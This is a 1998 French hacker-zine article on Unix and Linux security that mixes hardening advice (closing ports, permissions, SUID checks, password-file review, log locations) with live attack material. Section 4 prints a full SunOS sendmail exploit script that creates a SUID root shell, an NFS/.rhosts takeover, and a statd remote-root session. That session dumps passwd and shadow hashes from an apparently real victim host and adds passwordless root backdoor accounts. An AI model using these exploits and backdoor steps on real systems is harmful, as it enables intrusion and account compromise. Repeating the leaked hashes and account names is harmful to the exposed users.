-------------------------------------------------------------------------- [05] La sécurité sur un système UNIX & UNIX-LIKE #1 -------------------------------------------------------------------------- Preview 1.1 Quote fr.Wyzeman : bon chez IGA on aime les nouveautées alors pour faire changement ce mois-ci on a decider de vous apprendre quelque chose de vraiment utile :) Note de Lesaint : Vous êtes libre d?utiliser ce texte, de le publier, de le distribuer, de le découper à condition de laisser cette en tête et les greetings à son auteur. Si vous souhaitez faire une modification ou une correction elle sera la bienvenue à condition de me prévenir. Ceci n?est qu?une version preview l?equivalent d?une beta, donc si vous êtes alergique aux fautes d?ortografe attendez la deuxieme version ou la version finalle. D?autre part si vous pensez qu?une section non traitée serait interessante à integrer dans ce texte n?hésitez pas à me prévenir. Mais avant svp lisez le entier, merci. quote f2.Wyzeman : Il sagit d'un groupe de hacker francais ( tien des cousins ) qui ont voulus venir au quebec en bus, mais leur voyage est tomber a leau,non serieux, ils avaient un projet semblable au notre, so produire un zine de qualité(euh ou un zine tout court), et dapres les textes de notre reporter en france (so called LeSaint, ca aurait produit un zine de tres grande qualité).Cependant tous non pas la chance du debutant c pourquoi iGA dans un elan de générositer s'est offert afin de publier les texte de notre Robert guy scully. Table Des Matieres: ------------------- 1. Une vue globale de la sécurité - Les bons points pour Unix - Mesures de bases sur un systéme Linux - Mesures spécifiques à un systéme 2. Amélioration de l?authentification des utilisateurs : - Méthodes d?authentifications complémentaires - Contrôles lors de connexions 3. Fichiers & Systémes de fichiers - Le probléme des paths - Mode d?accés SUID et SGID - Les problémes liés au passwd - Quelques outils - Les fichiers sensibles - Les fichiers de logs (mouchard) , ou sont les traces ! 4. Vérifications des versions - Sun OS - SendMail - Statd exploit - Conclusion sur les exploits 5. Se tenir au courant - Web - Irc - La fin ! LeSaint - snipper@hotmail.com 1. Une vue globale de la sécurité : La sécurité ce n?est pas forcément penser aux attaques, mais plutot réfléchir à ce qu?il faut impérativement protéger et voir ce qui pourrait être sacrifier. Unix posséde 2 grandes lignes de défense, a savoir les droits accés et les mots de passe. 90% des attaques sur un systéme directe ou non seront confrontée avec une de ces 2 protections,voire les 2. Sécurité de bases sur un systémes linux : Si vous venez d?installer Linux et que l?envie d?aller sur Internet vous démange alors lisez au moins cela. Veillez a avoir des mots de passe pour tous vos utilisateurs, et surtout différents du nom de login. Désactivez les ports inutiles. Si vous ne prêter de shell a personne alors n?hésitez pas à couper le port 23 (Telnet). D?autre part, de désactiver le 79(Finger) me semble une bonne initiative. Finger (Telnet 79) Au prompt finger les commandes les plus utiles sont : user : Pour avoir la liste des utilisateurs et des informations complémentaires. [entrer] : Pour avoir la liste des personnes actuelment logger. [nom usr] [entrer] : Informations sur l?utilisateur. Finger (linux) finger [-lmsp] [user ...] [user@host] -s : Fait afficher le nom de login, le real name, état du mail, délais ecoulé depuis la derniére action, heure. Un * après le nom de treminal signifie l?impossiblité de msg par la commande write. -l : Pareil que s mais sur plusieurs lignes. Si l?usr a ouvert plusierus session elle seront affichées. Affiche aussi le repertoire, son shell et les contenus des fichiers .plan, ~/.project et ~/.forward. -p : Supprime le détails des contenus des fichiers précedemments cités. Pour désactiver un port éditer le fichier /etc/inetd.conf et placer un # devant la ligne correspondante. Pour reamorcer le deamon inetd suivez la procédure suivante : $ps -aux | grep inetd 130 [.................] inetd 1250 [...............] ps -aux | grep inetd $kill 130 $inetd Un scanner de port peut devenir utile. Le plus connu est appeler Strobe. Disponible en version simple ou en pack (iSS) . La ligne de commande classique est : $strobe -b 1 -e 160 127.0.0.1 Verifier que vous avez les bonnes permissions sur les répertoire clefs du systéme. Suivez donc la procédure suivante : - chmod 700 /root - chmod 700 /mnt - chmod 700 /floppy - chmod 700 /cdrom D?autre part si vous prevoyer une utilisation de X-Window par l?utilisateur root seulement : - chmod 700 /usr/X11/bin - chmod 700 /usr/X11R6/bin Mesures spécifiques a un systéme : Toutes les versions commerciales d?Unix offrent un systéme de sécurité amélioré qui fait parti intégrante du systéme d?exploitation. Voici les principales commandes selon les systémes : AIX chuser, audit, tcbck Digital Unix prpwd, secsetup HP-Ux audsys, pdfck SunOs C2conv, audit SCO Unix relax, prppw,authorize, audithsh IRIX stad, satconfig Regarder dans le pages du manuel peut s?averer utile, man -k secur. 2. Amélioration de l?authentification des utilisateurs : L?objectifs évident est demander à l?utilisateur de prouver ce qu?il prentend être en plus de son nom/login et de son mot de passe. Cette vérifiaction est générallement une 2ème identifiaction. Ce genre de module peuvent etre rajouter sur un systeme et sont generallement appeler cartes intelligentes. AIX,IRIX et Linux permettent l?ajout de programmes de ce types.A savoir que par défaut aucun n?en posséde un pré-installer. Génerallement le programme pose une 2ème question personnelle et très simple après le mot de passe, comme par exemple « Quelle est votre couleur préféré ? ». Au bout de 3 erreurs le compte est directement désactivé. L?objectif est en fait que si quelqu?un trouve votre mot de mot de passe soit parcequ? il est marqué sur un post-it en dessous de votre clavier, soit car c?est le même que votre messagerie éléctronique,etc ..., on ne pourra pas deviner votre couleur préféré car vous n?avez pas besoin de l?écrire pour vous en rappeller.De plus la désactivation du compte empêche une recherche à l?aveuglette pour un intrus, du moins s?il veut rester discret sur ses tentatives & échec de connexion. Rem : Une mesure de sécurité supplémentaire pourrait consister a desactiver des comptes certains jours à certaines heures. Le week-end ou la nuit par exemple les comptes des utilisateurs normaux peuvent être désactivés. Les mots de passe dial-up ------------------------- Les mots de passes dial-up constituent un autre moyen d?authentification de utilisateurs pour les systeme auquels on peut acceder par l?intermédiare de modems (Générallement ISP). Les mot de passes dial up utilisent 2 fichiers de configuration : /etc/d_passwd (fichier de mot de passe) & /etc/dialups, parfois appellé dial-ups. Ce fichier contient la liste des terminaux connecté aux modems de numérotation : /dev/tty10 /dev/tty11 /dev/tty13 Un mot sur le fichier /etc/d_passwd : Le fichier contient un ensemble de mot de passe chiffré. Une entrée du fichier contient 2 champs séparer par : . shell:mot-de-passe-chiffré: (Le dernier champs est tjs vide mais les derniers : ne peuvent pas être omis) D?autre part, le systéme ne fournit pas de mécanisme automatisé pour fournir de mot de passe chiffré. Pour le crypté vous même vous devez choisir une clé de 2 caractéres ainsi qu?un mot de passe avec les caractéres alpha numériques ansi que / et le « . » . Pour chiffrer le mot de passe exécutez la commande suivante : $echo «ppppppppss» | makekey makekey affiche le mot de passe chiffré sur la sortie standart (écran). Vous devrez ensuite le copier dans le fichier /etc/d_passwd. Par exemple, si vous choisissez 12345678 pour le mot de passe dial up et AB pour la clef pour produire le mot de passe la commande sera : $echo «12345678AB» | makekey Abk0sdfghlkdf La chaine de caractére rendu par makekey à savoir Abk0sdfghlkdf est le mot de passe chiffré. Si vous utilisez un systéme SCO UNIX, cous disposé de la commande passwd -m qui changera les mot de passe en chiffré (D?autre part ces mot de passe doivent être changer réguliérement.) . Bien évidemment vous pouvez adapté cette procédure de cryptage à d?autre utilisation propre au systéme. 3. Protections des fichiers & systémes de fichiers : L?objectif d?un systéme de sécurité est d?empêcher les utilisateurs de faire certainne actions ou d?accéder à certaines données. Un utilisateur veuillant faire ce qu?il désire sur un systéme a besoin du compte root. Si le mot de passe a bien été choisi, l?utilisateur peut essaye d?autre solution liées au droit d?acceés et aux systéme de fichiers. Par exemple une solution consiste a essayer de faire taper ces commandes par le root. $cp /bin/sh /tmp/.junk $chmod 4755 /tmp/.junk Ces commandes créent une version SUID root du shell bourne. Tout utilisateur pourra lancer un shell à partir de ce fichier et toutes les commandes qu?il éxecutera a partir de ce shell seront éxecutées en tant que root. $id UID user(500) GID user(500) EUID(0) root $/tmp/.junk $cd /root $echo «no problem !» no problem ! $vi /etc/passwd Je vous laisse imaginer la suite. D?autre part une catégorie importante des attaques menées sur un systéme consiste à subsituer des versions modifiées (Trojan en autre ...) aux commandes ou aux fichiers de configuration. (Vous avez suivi le rapport ? ) Donc la suite de cette partie nous allons donc regarder les trous de sécurité qui proviennent de droits mal choisi ou d?une désorganisation de l?administrateur. Le probléme des chemins de recherche Pour comprendre ce trou de sécurité potentiel il faut savoir que quand on tape par exemple ls, la commande est recherchée dans le chemin de recherche dans l?ordre ou il ont été spécifié dans le path. $echo $PATH /tmp :/bin/ :/usr/bin :/usr/bin/X11 :.:$HOME/bin Si par exemple, le chemin de recherche indique que la fonction ls va etre chercher d?abord dans le réptoire /tmp, rien n?empêche un utilisateur de faire un script (comme vu précedement qui copie un shell) dans le repertoire /tmp et de l?appeler ls. Donc si le root execute cette comande, cela executera le script. Ce probléme est rare mais il mérite d?être verifier. Mode d?accés SUID et SGID les modes d?accés SUID et SGID sont habituellment un moyen d?accorder aux utilisateurs un access au systéme (auquel ils n?ont génerallement pas le droit) temporairement et en fonction des commandes. Les accés SUID et SGID sont ajouté en utilisant chmod et s. $chmod u+s fichiers $chmod g+s fichiers Ce genres de fichiers sont facilement reconaissanble. Le fichier /bin/passwd est un bon exemple. $ls -lo /bin/passwd -rwsr-xr-x 3 root 5552 Jan 29 1997 /bin/passwd Lorsque quelqu?un utilise cette commande (modification du password) son EUID est remplaçé par celui du Root pour la durée de la commande. Il faut donc vérifier que tous les programmes dotter de cet attribut ne permettent pas de faire autre chose en même temps que leur execution. Par exemple un programme en C développé par l?administrateur pour automatiser une tâche peut être doter des droits root mais il est peut etre aussi possible pour n?importe de quitter de programme de force (control-c ou break) et de retomber sur un shell ou il est root. Pour localiser toutes les programmes doter de l?attribut s taper : #find / \( -perm -2000 -o -perm -4000 \) -type f -print Le fichier de mot de passe /etc/passwd Les problémes de sécurité les plus courant de mot de passe sont : - Les comptes sans mot de passe - Les UID 0 pour des comptes différents que celui du root - Les GID 0 pour des comptes différents que celui du root - Le propriétaire et les droit d?accés du /etc/passwd - Les copies du fichier /etc/passwd - Les noms de login non valides Les comptes à UID ou GID 0 sont intéressant a surveiller car ce sont de comptes SuperUser. D?autre part des lignes non valides dans le fichier passwd sont souvent exploitables. Par exemple: : :0 :0 : : : . Cette ligne définit un SuperUser sans mot de passe mais sans login. Si vous essayer de vous logger cela ne marchera pas, mais la commande su fonctionnera. $su « « # Quelques outils Pour détecter des mots de passe mal choisit vous pouvez utilisez crack, qui est un script du domaine public. Vous devez d?abord éditer le fichier et le configurer pour votre systéme puis éxécutez le en utilisant des dictionnaires. D?autre part si vous avez une plateforme Dos, l?outils le plus performant s?appelle John the ripper.Les lignes de commandes les plus classiques sont : C :> john -beep -list -incremental passwd C :> john -beep -list -w :dico passwd Les fichiers sensibles Voici une liste de fichiers qu?il faut connaître, car il peuvent servir de support à une attaque ou en être directement la cible. FICHIERS : INFO & OBJECITF ~/.chsrc, ~/.login, ~/.logout Fichier d?initialisation du compte /.kscrc, /.profile /.foward, /.mailrc Fichier d?initialisation du courrier électronique /.emacs, ./exrc Fichier d?initialisation de l?éditeur du compte /.rhosts /etc/cron/*, /usr/lib/cron/* Droits d?accés des fichier cron et at /var/spool/cron/*, /usr/lib/crontab* Fichier crontab /usr/spool/cron/crontabs /etc/dialups, /etc/d_passwd Fichier de mot de passe dial up & config. /et/default/* (System V) Valeur par default user et systéme (IRIX, Solaris, SCO) /etc/config/* Valeurs des sous systéme (IRIX) /etc/exports Systémes de fichiers accéssibles aux autres par NFS /etc/fstab, /etc/vfstab Fichier de configuration du systéme de fichier /etc/default/filesys, /etc/filesystems /etc/ftpusers Utilisateurs interdit de ftp /etc/group Fichier de définition des groupes /etc/hosts Configuration TCP/IP /ets/hosts.equiv Sites TCP/IP Sûr /etc/inetd.conf Configuration des deamons internet /etc/init.d/*, /etc/inittab, /etc/*rc* Scripts de demarrage /etc/rc ?.d/* /etc/netgroup Définition des groupes réseaux NIS /etc/networks Configuration TCP/IP /etc/passwd, /etc/shadow Fichier de mot de passe /etc/profile Fichier d?initialisation des comptes /etc/remote Définition des modems de numérotation /etc/security/* Fichiers de donnée des comptes usr sur AIX, fichier de config Sécurité sur SunOS /tcb Répertoire de sécurité amélioré sur SCO Unix, HP-UX 10 et Digital Unix /.secure Sécurité amélioré sur HP-UX /etc/services Configuration Tcp/Ip /etc/shells Listes des shells valides /etc/swapspaces Zone de pagination systéme (AIX) /etc/syslog.conf Fichier de config de la journalisation du systéme /etc/ttys Lignes de terminaux (BSD) /etc/wtmp, /var/adm/wtmp Enregistre toutes les connexion et déconnexion. /etc/utmp Base de donnée des usr connecté /var/adm/* Script d?administration /etc/aliases, /usr/lib/aliases Alias /etc/sendmail.cf, /usr/lib/sendmail.cf Fichier de configuration de sendmail /usr/lib/uucp/* Fichiers de configuration et scripts uucp /var/spool/*, /usr/spool/* Répertoire des files d?attente /usr/include Bibliothéques. (Cible idéales pour les substitutions) Ts les fichiers SUID & SGID Quelque soit leur emplacement 4. Vérification des versions : Un exploit permet a n?importe qui d?avoir accés à des informations ou d?effectuer une opération normalement interdite, grâce à une déffaillance du systéme. En voici quelque un en guise d?exemple. La totalité étant disponible sur internet (voir le dernier chapitre : Se tenir au courant) . Exploits SUN Un ancien bug de Sun Os permettait de modifier le .rhosts distant. En voici la méthode /exemple généralment appellée methode showmount. $showmount -e ip_remote_or_dns /usr ip_remote_or_dns /home /cdrom $mkdir /tmp/mount $mount -nt nfs ip_remote_or_dns :/home /tmp/mount $ls -sal /tmp/mount total 3 1 drwxrwxr- x 8 root root 1024 Jul 4 20 :34 ./ 1 drwx------ 8 test 100 1024 Jul 21 18 :54 rapper/ $id uid=0 euid=0 $whoami root $echo « rapper : :102 :2 : :/tmp/mount :/bin/csh » >> /etc/passwd $su -rapper $ls -lsa /tmp/mount/ total 3 1 drwxrwxr- x 8 root root 1024 Jul 4 20 :34 ./ 1 drwx------ 8 rapper deamon 1024 Jul 21 18 :54 rapper/ $echo « + + » > rapper/.rhosts $cd / $rlogin ip_remote_or_dns Welcome to ip_remote_or_dns ip_remote_or_dns~$echo « do what u want .. » do u what u want Exploits Sendmail Exemple d?un exploit sendmail. 8.x.(1) SunOs-sendmail Exploit : Cet exploit crée un shell SUID (root). #!/bin/sh # # Syntax: roption host # # host is any system running sendmail (except localhost). # # This exploits a flaw in SunOS sendmail(8), and attempts # create a suid root shell # # Written 1995 by [8LGM] # Please do not use this script without permission. # PROG="`basename $0`" PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS # Check args if [ $# -ne 1 ]; then echo "Syntax: $PROG host" exit 1 fi # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]; then echo "Sorry, this only works on SunOS" exit 1 fi PROG="`basename $0`" EXECME=/tmp/HotterThanMojaveInMyHeart # Create EXECME.c cat > $EXECME.c << 'EOF' main(argc,argv) int argc; char *argv[]; { chown("/tmp/InfamousAngel", 0, 0); chmod("/tmp/InfamousAngel", 04755); } EOF cc -o $EXECME $EXECME.c # Check we have EXECME if [ ! -x $EXECME ]; then echo "$PROG: couldnt compile $EXECME.c - check it out" exit 1 fi /bin/cp /bin/sh /tmp/InfamousAngel # Run sendmail /usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF' To: No1InParticular Hows it goin EOF exec /tmp/InfamousAngel Autre exemple, le STATD exploit (Depuis R9 Mhd) Cettes section sur cet exploit est en fait tiré directement du MHD. Je pense que l?avoir integrer sur cette doc est une bonne idée car ce bug fait parti des plus connue. Cet exploit fonctionne sur SunOS X.X & Sys V. Il utilise un probléme de buffer overflow des remotes procedures (rpc). Le résultat : Vous pouvez devenir root sur un systme distant. InterCore:/home/chameleon/ $statd Erreur! Signet non défini. *This server is statd exploitable but the server admin has been notified so don?t try it.* rpc.statd is located on tcp port 44417 sent exploit code, now waiting for shell... *first thing to do is type, w, to see who is on and if any sysadmins are active* # w 5:27am up 3 day(s), 6:35, 4 users, load average: 0.05, 0.06, 0.07 User tty login@ idle JCPU PCPU what gabe pts/3 Sat 1am 2:38 1:37 -tcsh gburgyan pts/4 Fri11pm 55 20 2 pine gabe pts/5 Sat 7am 3:08 29 -tcsh gburgyan pts/8 Mon 4am 23:22 16 -tcsh *Note: statd is not telnet so you wont show up when someone does w etc.. so you are a ghost* # cat /etc/passwd root:x:0:1:System Administrators:/:/sbin/sh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: kane:x:539:107:Kane Products FTP account:/usr/www/docs/kane/:/bin/true ecco:x:540:107:ECCO:/usr/www/clients/ecco/:/bin/true iodatsys:x:541:107:I/O Data Systems:/usr/www/clients/iodatasys/:/bin/true nealschu:x:542:107:Neal Schuman FTP Account:/usr/www/clients/nealschuman/:/bin/true jjames:x:543:107:Joanne James:/home/jjames:/bin/tcsh nlock:x:543:107:nlock:/home/milo:/bin/tcsh xlock:x:0:1:xlock:/:/sbin/sh # echo b0bby:x:542:107:Rhino9 owns bitch:/usr/rhino9/:/bin/tcsh >> /etc/passwd # echo b0b:x:0:1:Rhino Root:/:/sbin/sh >> /etc/passwd *What this does is copys a low level user b0bby and a root user b0b. Remember that 2 >>?s make the stuff appened to the passwd file. If it was one > then the whole thing would be over written and that is not good!* # cat /etc/shadow root:jLKY54WA3Teeo:10200:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: kane:*LK*::::::: ecco:J/f78z945yJiQ:10199:::::: iodatsys:k/F455ygv0lKo:10199:::::: nealschu:Z1te54ytjJxtyY:10199:::::: jjames:q1dMg453A0LYLE:10199:::::: nlock:hEcxTL/4353p3FU:10216:::::: xlock::10200:::::: # echo b0bby::10199:::::: >> /etc/shadow # echo b0b::10200:::::: >> /etc/shadow *You must do the passwd and shadow echos as we have show here if the system uses shadowed passwords. What we have just done is add the logins to the shadow password* # *Now press control + ][ Then hit enter* DropStatd> quit *Type quit at the prompt. You are now back on your system. Now telnet back to www.victim.com* InterCore:/home/chameleon/ $ telnet Erreur! Signet non défini. Trying 205.133.121.210... Connected to deals.4deals.com. Escape character is '^]'. UNIX(r) System V Release 4.0 (hq) login: b0bby *Then it will ask you to set a password* VictimCorp$ su b0b # *What we did the was su into b0b, our root account. Now set a pass for b0b* # passwd b0b *Enter your pass* Conclusion sur les exploits Comme je vous l?ai dit au début ces exploits sont juste là en guise d?exemple car il en existe énormement. D?autre part certain peuvent avoir d?énorme conséquences donc il vaut mieux se tenir au courant. Les fichiers logs, ou sont enregistrées les traces ? Une intrusion sur un systéme unix passe guére inaperçue ... En effet soyez certain que toutes vos actions soient enregistrés quelques part, alors voici un aperçue des fichiers mouchards ;). La commande de base pour voir les logs est last. Faites un essaie, en tapant last root. Les fichiers logs varie selon la version du système unix. Répertoire Informations /usr/adm Ancienne version d?Unix /var/adm Cette partie est générallment en mount read only. /var/log Utilisés seulement par Solaris, Linux, BSD Fichiers Informations acct ou pacct Enregistre toutes les commandes éxécutées par tous les utilisateurs aculog Enregistre toutes les connexion dial (Modem) lastlog Enregistres les logins récent loginlog Enregistre les erreur au mot de passe messages Enregistre les messages délivrés par la console et les syslog. sulog Enregistre toutes les utilisation de la commande su utmp Enregistre le login courrant de l?utilisateur utmpx Version améliorée de utmp wtmp Enregistre les login et logout vold.log Enregistre les erreurs sur un périphérique (Disk, CD-Rom ...) xferlog Enregistre les accés FTP Après ça vous devez vous doutez donc que rentrer sur un systéme unix peut paraître facile quelques fois mais ne pas laisser de traces risque d?être d?un niveau un peu plus élevés. 5. Se tenir informer : Il y a beaucoup de site Internet traitant de la sécurité et ils sont générallement tous bien a jour. - www.technotronic.com - www.x-treme.org - www.rootshell.com - www.cern.org - www.bugtraq.com Les principaux soft de server web sont a regarder aussi de temps en temps. Par exemple : - www.ncsa.com - www.apache.com Sur irc, les channels ne manquent pas non plus. Sur server Undernet : - #technotronic - #rhino9 - #hackphreak - #rhino9 - #darkeclipse - #hackersplanet. - #hack.fr (n'existe plus) - #Sector_x (addon by Wyzeman) Sur server EFFnet : - #linux - #unix (Ces channel existent aussi sur undernet mais sont moins fréquenté). Par contre si vous demandé des renseignements de sécurité sur Irc, pour des raisons évidentes évitez de préciser que c?est de votre site que vous parlez. LA FIN ! Bon voilà c?est finni ... Bonne chance à tous ! Le savoir n?est pas un crime ni les travaux pratiques. Have Phun ! N?oubliez pas que toutes vos remarques sont les bien venues ! (snipper@hotmail.com) ------ quote from Wyzeman : bon vous voyez, ce nest pas si douloureux aprendre :P Quote from __2 : Wyze ta compris keke chose toi? :] [LeSaint preview achevée le Mardi 14 Avril 1998 à 23h49 Pm.] hein?????? ------------------------------------------------------------------------------------------- /| /~| /~| ;; iLLEGAL GRaNTeD aCCeSS Quebec Denial Monthly Zine #5 | | | / | | ;; [When the power look like a stupid cow ass] | | | |) | .| ;; | | | / | |/ ;; http://www.undernetsuxx.org :: Mirror: http://members.xoom.com/I_G_A/ |/ |/ |/ ;; Email: iga@undernetsuxx.org or I_G_A@hotmail.com -------------------------------------------------------------------------------------------